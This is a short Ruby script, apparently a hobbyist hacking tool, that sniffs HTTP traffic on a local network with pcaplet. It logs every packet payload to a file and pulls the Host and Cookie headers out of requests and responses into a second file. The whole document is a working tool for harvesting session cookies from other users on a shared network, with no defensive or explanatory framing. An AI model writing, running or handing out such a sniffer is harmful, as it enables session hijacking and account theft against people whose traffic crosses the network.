#coded by protos
#protos[dot]nu[at]gmail[dot]com
#simple http sniffer, configured for a lan net
require 'pcaplet'
include Pcap
log=File.open('log.txt', 'w')
file=File.open('info.txt', 'w')
sniff=Pcaplet.new('-s 1500')
filtro1=Pcap::Filter.new('tcp and src port 80', sniff.capture)
filtro=Pcap::Filter.new('tcp and dst port 80', sniff.capture)
sniff.add_filter(filtro | filtro1)
sniff.each_packet {|x|
log.puts x.tcp_data
if filtro =~  x
	print x.tcp_data
	if x.tcp_data =~ /Cookie:/
	host= x.tcp_data.split("Host: ")[1].split(" ")[0]
	cookie=x.tcp_data.split("Cookie: ")[1].split("\n")[0]
	file.print "Host: #{host}\nCookie: #{cookie}\n\n\n"
	end
elsif filtro1 =~ x
	if x.tcp_data =~ /H(\w*)\n\n/
	print x.tcp_data
	if x.tcp_data =~ /Cookie:/
	host= x.tcp_data.split("Host: ")[1].split(" ")[0]
	cookie=x.tcp_data.split("Cookie: ")[1].split("\n")[0]
	file.print "Host: #{host}\nCookie: #{cookie}\n\n\n"
end
end
end


}